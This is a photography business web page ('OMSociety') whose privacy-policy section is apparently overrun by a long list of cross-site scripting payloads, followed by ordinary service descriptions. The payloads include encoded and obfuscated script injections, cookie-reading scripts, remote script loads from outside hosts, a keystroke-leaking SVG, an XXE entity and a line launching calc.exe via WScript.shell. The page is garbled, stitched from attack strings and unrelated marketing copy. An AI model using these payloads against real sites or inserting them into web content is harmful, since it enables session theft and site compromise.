OMSociety

Privacy Policy

"><iframe src=http://om.myexample.in onload=confirm(5) <<iframe src=a> "><iframe src=http://om.myexample.in onload=confirm(8) <

% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%

<a href=http://om.myexample.in/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">

<div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>

<x '="foo"><x foo='><img src=x onerror=alert(1)//'><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>

<div style=content:url(test2.svg)></div><div style="background:url(test5.svg)">PRESS ENTER</div>

<! XSS="><img src=xx:x onerror=confirm(1)//">

<% a=%&gt<iframe/onload=alert(1)//>

"; ||confirm('XSS') || "

<? echo('<SCR)';

<? foo="><script>confirm(1)</script>">

"/> <img src='aaa' onerror=confirm(document.domain)>

/> <img src='aaa' onerror=confirm(document.domain)>

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

<body/onload=`confirm(4)//`">

<img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>

//|\\ <script //|\\ src='http://om.myexample.in/xss.js'> //|\\ </script //|\\

<// style=x:expression\28write(1)\29>

<![><img src="]><img src=x onerror=alert(1)//"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>

&#0000060

&#0000062

&#000060

&#000062

&#00060

&#00062

&#0060

&#0062

</form><input type="date" onfocus="confirm(1)">

<%00/title>

&#060

&#062

0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>

~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('

1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>

%2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E

%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E

%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E

%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E

"%25prompt(9)%25"

"%26%26prompt(9)%26%26"

%26lt%3bscript>

"%26prompt(9)%26"

%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E

<3 </3

"><h1/onmouseover='\u0061lert(1)'>%00

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

%3C

%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E

%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E

%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E

%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E

%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E

%3E

[4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//">

&#60

&#62

<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>

[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">

"'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF

"'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF

+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);

<B <SCRIPT>confirm(1)</SCRIPT>>

<B="<SCRIPT>confirm(1)</SCRIPT>">

<![C b="c">

%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E

<![CDAÄ¹Ä¹@

<![CDAT<!

<![<CDATA[C%Ada b="c":]]]>

<![CDb m="c">

<!DOCTY

<!DOCTY.

<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />

<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80

&GT

&GT;

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-

<IFRAME%20src='javascript:confirm%26%23x25;281)'>

<![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>">

<IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF)

<IMG SRC="javascript:confirm(document.location)"

<IMG SRC="jav	ascript:confirm(<WBR>document.location);">

<IMG SRC="jav
ascript:confirm(<WBR>document.location);">

<IMG SRC="javascript:confirm(<WBR>document.location);">

<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>

<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>

<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41>

<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>

&LT

&LT;

<META HTTP-EQUIV="Link" Content="<http://om.myexample.in/xss.css>; REL=stylesheet">

<META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>">

PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+

<S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>

<SCR%00IPT>confirm(document.location)</SCR%00IPT>

<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>

<SCRIPT a=">" '' SRC="http://om.myexample.in/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://om.myexample.in/xss.js"></SCRIPT>

<SCRIPT a=">" SRC="http://om.myexample.in/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://om.myexample.in/xss.js"></SCRIPT>

<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#

</SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT>a=document.cookie

<SCRIPT>confirm(document.location);</SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://om.myexample.in/xss.js"></SCRIPT>

SRC=&#10<IMG 6;avascript:alert('XSS')>

<STYLE TYPE="text/javascript">confirm(document.location);</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE>

<STYLE>BODY{-moz-binding:url("http://om.myexample.in/xss.svg")}</STYLE>

<STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A>

<STYLE>@import'http://om.myexample.in/xss.css';</STYLE>

"><STYLE>@import"javascript:confirm(document.location)";</STYLE>

<STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

[U+2028]prompt(1)[U+2028]-->

&#X000003C

&#X000003C;

&#X000003E

&#X000003E;

&#X000003c

&#X000003c;

&#X000003e

&#X000003e;

&#X00003C

&#X00003C;

&#X00003E

&#X00003E;

&#X00003c

&#X00003c;

&#X00003e

&#X00003e;

&#X0003C

&#X0003C;

&#X0003E

&#X0003E;

&#X0003c

&#X0003c;

&#X0003e

&#X0003e;

&#X003C

&#X003C;

&#X003E

&#X003E;

&#X003c

&#X003c;

&#X003e

&#X003e;

&#X03C

&#X03C;

&#X03E

&#X03E;

&#X03c

&#X03c;

&#X03e

&#X03e;

&#X3C

&#X3C;

&#X3E

&#X3E;

&#X3c

&#X3c;

&#X3e

&#X3e;

XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>

X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<a data-remote=true data-method=delete href=/delete_account>CLICK</a>

<a href="#" ping="file://%00/%00/x">Boom</a><script>document.querySelector('a').click();</script>

<a href="// Í¥.ws">CLICK

<a href=[0x0b]" onclick=confirm(1)//">click</a>

<a href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>

"><a href="JAVASCRIPT:%E2%80%A8alert`1`">CLICKME

<a href="data:\@['{Â§(`__`)$}']@\, % 3 c script % 3 e alert(1) % 3 c/script %3 e">click</a>

<a href="data:ã€€, &lt &NewLine; script &gt alert(1) &lt /script &gt ">CLICK

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>

<a href="data:text/html,%3cscript>confirm (1)</script>" >hello

<a href="data:text/html;base64,PHN2Zyè¨9vbmxvæ™•YWQ<>>9YWxlc>>>nQoMSk+">click</a>

"/><a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a>

"/><a href="invalid:2" id=x name=y>test</a>

<a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a>

<a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>

"/><a href=javascript&colon;confirm(document&period;cookie)>Click Here</a>

"><a href=javascript&colon;confirm(document&period;cookie)>Click Here</a>

<a href=javascript&colon;confirm(document&period;cookie)>Click-XSS</a>

"><a href="javascript&colon;\u0061l&#101%72t(1)"><button>

<a href="javascript:data:alert(1)">click</a>

<a href="javascript:history:alert(this.history.length)">click</a>

<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>

<a href="javascript:name">CLICK</a>

<a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme

a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a>

<a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script>

<a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>

<a onhelp='eval(href+"confirm(1)")'contenteditable='true'href=' javascript:'>click</a>

<a rel="noreferrer" href="//om.myexample.in">click</a>

<a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>

<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E

<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>;

<a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>;

<a href=[]" onmouseover=prompt(1)//">XYZ</a

about://om.myexample.in

![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

<a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>

<a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello

<a/href=java&Tab;script:confirm%28/XSS/%29>click</a>

[a](j a v a s c r i p t:prompt(document.cookie))

![a](javascript:prompt(document.cookie))\

[a](javascript:prompt(document.cookie))

alert(1 === áš€1)

![a'"`onerror=prompt(document.cookie)](x)\

<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss

a=<script>alert(1);/*&b=*/</script>

<a[\x0B]onmosemove=confirm('\Done\')>

<a[\x0B]onmouseover=location=â€™jav\x41script\x3aconfirm\x28â€³ZDresearchâ€\x29â€²>ZDresearch

[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)

<b <script>alert(1)//</script>0</script></b>

<base href="data:\"><link rel=import href='q,<script>alert(1)</script>'>

<base target="<script>alert(1)</script>">

<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>

<body language=vbs onload=confirm-1

"><body language=vbs onload=window.location='http://om.myexample.in'>

<body/onactivate=URL=name//

<body/onload=<!-->&#10confirm(1)>

"<body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>"

"\"><body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>",

<body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>

><body/onload=<!-->&#10confirm(1);prompt(/XSS/.source)>

"><b/onclick="javascript:window.window.window['confirm'](1)">bold

<button onclick="window.open('http://om.myexample.in/::Error138 ');">CLICKME

"<button>'><img src=x onerror=confirm(0);></button>"

charset=utf-

'`"><*chr*script>log(*num*)</script>

<cite><a href="javascript:confirm(1);">XSS cited!</a></cite>

[citelol]: (javascript:prompt(document.cookie))

<command onmouseover="javascript:confirm(0);">Save //

<Å¿cript/async/src=//â’›â‚¨>

<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>

<*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>

<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>

data:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1)

data:text/html,<script>alert(document.domain)</script>

data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//>

',__defineSetter__('x',alert),x=1,'

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f

<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

<div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)">

<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>

<div style='x:anytext/**/xxxx/**/n(confirm(1)) ("\"))))))expressio\")'>aa</div> //

<%div%20style=xss:expression(prompt(1))>

<div/onmouseover='confirm(1)'> style="x:">

<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div>

<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>

<div='/x=&#39&gt<iframe/onload=alert(1)&gt>

<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//om.myexample.in/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//om.myexample.in/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//om.myexample.in/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//om.myexample.in/?d" /></image></svg>

eval("\x61\x6c\x65\x72\x74\x28\x31\x29â€)

<event-source src="event.php" onload="alert(1)">

exp/*<XSS STYLE='no\xss:noxss("*//*");

<fORm/hello^waf/aCTIon=j&Tab;avas&Tab;cript&NewLine;:alert/**/(docu&Tab;ment.coo&Tab;kie)><InPuT/TyPe=submit

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true);

<form action='data:text/html,<script>confirm(1)&lt/script&gt'><button>CLICK

<form action='java&Tab;scri&Tab;pt:confirm(1)'><button>CLICK

<form id="myform" value="" action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form>

<form><a href="javascript:\u0061lert(1)">X

//<form/action=javascript:confirm(document&period;cookie)><input/type='submit'>//

<form><button formaction=javascript&colon;confirm(1)>CLICKME

<form><isindex formaction="javascript&colon;confirm(1)"

<frameset onpageshow="alert(1)"> <body onpageshow="alert(1)"

&gt

http://www.google<script .com>confirm(document.location)</script

http://www.<script abc>setTimeout('confirm(1)',1)</script .com>

http://www.<script>confirm(1)</script .com

"><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

"><iframe%20src="http://google.com"%%203E

iframe.contentWindow.location.constructor.prototype

"><iframe/onreadystatechange=confirm(1)

"><iframe/src \/\/onload = prompt(1)

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

<img ="><script>alert(1)</script>">

"><img src="/" =_=" title="onerror='prompt(1)'">

<img src ?itworksonchrome?\/onerror = confirm(1)

<img src ?itworksonchrome?\/onerror = confirm(1)???

â€œ><img src= onerror=confirm(1)>

<img src=`%00`&NewLine; onerror=confirm(1)&NewLine;

"]<img src=1 onerror=alert(1)>

"]<img src=

Capturing Moments That Last Forever

Event Photography

From corporate events to birthday parties, we'll capture all the special moments of your event. Our team of experienced photographers will work with you to ensure that your event photography is everything you've ever wanted.

Nature Photography

Our nature photography captures the beauty of the world around us. From stunning landscapes to majestic wildlife, we'll help you bring a piece of nature into your home.

Photo Editing

We offer professional photo editing services to help you enhance and perfect your photos. Whether you need minor touch-ups or major edits, our team of skilled editors will work with you to create the perfect photo.

Downloads

Privacy Policy

Capturing Moments That Last Forever

Event Photography

Nature Photography

Photo Editing

This website uses cookies.